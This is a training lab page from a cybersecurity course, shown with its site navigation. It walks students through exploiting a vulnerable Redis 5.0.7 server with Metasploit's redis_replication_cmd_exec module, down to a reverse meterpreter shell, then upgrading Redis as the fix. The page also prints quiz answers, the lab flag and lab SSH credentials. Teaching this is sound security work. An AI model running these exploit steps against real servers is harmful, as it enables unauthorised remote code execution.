📘
CAS Cybersecurity
  • Start
  • Reconnaissance
    • Opensource Intelligence
  • Docker basics and Images
    • Damn Vulnerable Webapp
    • bWAPP
    • Juice Webshop
    • Webgoat
    • Metasploitable 2
    • Metasploitable 3
    • MISP Docker (old)
    • MISP Docker (new)
  • Scanning and Enumeration
    • Scanning with zenmap
    • Scanning with nmap
    • Scanning with msf auxiliary
  • Vulnerability Scanning and Analysis
    • OpenVAS
    • nmap vulnerability scan
    • MSF Auxiliary Modules
  • Exploitation
    • Metasploitable 2
    • Redis Server
    • Print Nightmare
    • Baron Samedit
    • Polkit
    • Heartbleed
  • Man in the Middle
    • ARP Cache poisoning
    • RDP MitM Exercise
  • Windows Hacking
    • Throwback Network
      • Entering the breach
      • Exploring the caverns
      • Webshells and you!
      • First Contact
    • WinAttack LAB
      • Module 01
      • Module 02
      • Module 03
      • Module 04
      • Module 05
      • Module 06
      • Module 07
      • Module 08
      • Module 09
      • Module 10
  • Web Application Security
    • Burp Proxy Introduction
    • DVWA
      • DVWA Exercises 1
      • DVWA Exercises 2
      • DVWA Exercises 3
      • DVWA Exercises 4
      • DVWA Exercises 5
      • DVWA Exercises 6
      • DVWA Exercises 7
      • DVWA Exercises 8
  • CTF and Crypto Exercises
    • Cyberchef Challenge
    • HTB Invite Challenge
    • BSides London 2019 Challenge
    • Ninja Sec Challenge
  • Threat Intelligence
    • MISP Exercise 1
    • MISP Exercise 2
    • MISP Exercise 3
    • MISP Exercise 4
    • MISP Exercise 5
    • MISP Exercise 6
    • MISP Exercise 7
    • MISP Exercise 8
    • Virus Total Graph Exercise
    • RFI Incoming!
  • Forensic Exercises
    • Disk Forensics
      • The Sleuth Kit Intro
      • Filecarving with Foremost
      • Filecarving with scalpel
      • Bulk extractor
      • Disk acquisition with dd
      • Disk acquisition with dcfldd
      • Disk acquisition with ewftools
      • Disk acquisition with FTK Imager
      • Mount disk image (raw)
      • Unknown USB Stick
      • USB Stick Filecarving
      • Autopsy Exercise
    • Windows Forensics
      • Bitunlocker
      • Alternate Datastreams
    • Memory Forensics
      • Volatility2 Basics (Linux)
      • Volatility2 Exercise 1
      • Volatility3 Exercise 1
      • Volatility3 Exercise 2
      • Volatility3 Exercise 3
    • Image Forensics
      • Unswirl Image
      • Manual Filecarving 1
      • Manual Filecarving 2
    • Browser Forensics
    • Mail Header Analysis
    • Timestomping Exercise
    • Network Forensics
      • Tshark Exercise
  • Malware Analysis
    • Ransomware
      • General Introduction
      • Ryuk
      • RansomEXX
      • REvil
      • BlackMatter
      • Hades
      • Egregor
      • DoppelPaymer
    • YARA
      • YARA Install
      • yarGen
      • YARA with Cyberchef
      • TCP dump analysis
      • Memory dump analysis
    • Dosfuscated Scripts
  • Android Malware
    • LAB Setup 1
    • LAB Setup 2
    • Android Manifest
    • Android Permissions
    • APP Tracing with Frida
    • AES Key decryption
    • RedAlert
    • BlackRoseLucy
    • Crackme RE Challenge
  • Forensic Readiness
    • Windows Event Logs
    • Windows Sysmon
    • Sysmon: Capture Clipboard
    • Sysmon: Process Injection
    • Ransomware Detection
      • Signature based
  • Live Response
    • Velociraptor P1
    • Velociraptor P2
    • Velociraptor P3
    • Windows Response LAB
      • Lateral Movement Detection
      • Detect persistence
      • Volatility Analysis
Powered by GitBook
On this page
  • Metasploit - Exploit Redis Server
  • 1. Introduction
  • 2. Metasploit Introduction
  • 3. Module Search
  • 3. Use and configure Exploit module
  • 4. Exploiting Redis and retrieve flag
  • 5. Upgrade Redis Server

Was this helpful?

  1. Exploitation

Redis Server

PreviousMetasploitable 2NextPrint Nightmare

Last updated 3 years ago

Was this helpful?

Metasploit - Exploit Redis Server

1. Introduction

You are a system engineer at a paper company called Neat Sheets. Recently, the development department requested a Redis installation on one of the servers, as it is developer friendly and it supports a large variety of programming languages. They say that it is also really fast and that fact piqued your interest as well.

Your first choice was to install Redis version 5.0.7, but a colleague informed you that this version might be vulnerable to arbitrary code execution. You trust him but you decide to see if it is actually doable. You heard that there is an application called Metasploit out there that is perfect for exactly these cases.

2. Metasploit Introduction

Let's start metasploit with the msfconsole command.

First use the help command to anwer the following questions:

  1. Which command gets the value of a global variable?

  2. Which command routes traffic through a session?

  3. Which command searches module names and descriptions?

Answers:

  1. getg

  2. route

  3. search

3. Module Search

Now that you know what different commands you can use in Metasploit, it is time to choose the right module to test your Redis server.

  • You have to find a redis replication code executen module.

  • Redis is running on a linux server

search redis

  1. What is the Disclosure date for the Redis command execution module?

Answer:

  1. 2018-11-13

3. Use and configure Exploit module

After selecting the module, you just need to set the variables and you can start exploiting. You can do this by running use to select the chosen module:

use exploit/linux/redis/redis_replication_cmd_exec

Now you have to configure framework options and parameters for the module using set. For example, to set the target host for exploitation, you can run:

set RHOSTS <host address>

You will need to do this for LHOST, RHOSTS, and SRVHOST variables with set to specify the source and target IPs found below:

set lhost 192.168.6.1 set rhosts 192.168.6.2 set srvhost 192.168.6.1

Finally, execute the exploit command to run the exploit.

In Metasploit, LHOST, RHOST, and SRVHOST are some of the most commonly used variable names. LHOST refers to the IP of your machine, which is usually used to create a reverse connection to your machine after the attack succeeds. RHOST (or RHOSTS for some modules) refers to the IP address of the target host. SRVHOST is where the module will connect to download additional payload elements.

show options exploit

4. Exploiting Redis and retrieve flag

We get a meterpreter shell:

Read the contents of the /root/flag.txt file in the Redis server.

Content of flag.txt:

thahSh8uaViathaevee6

5. Upgrade Redis Server

Login to the Redis server via SSH.

Hostname: server Username: student Password: student

Stop the Redis service. Service: redis.service

Sudo privileges for starting/stopping Redis: already granted Upgrade Redis with Apt. Sudo privileges to use Apt: already granted

ssh student@192.168.6.2

sudo systemctl stop redis

sudo apt-get update

sudo apt-get install redis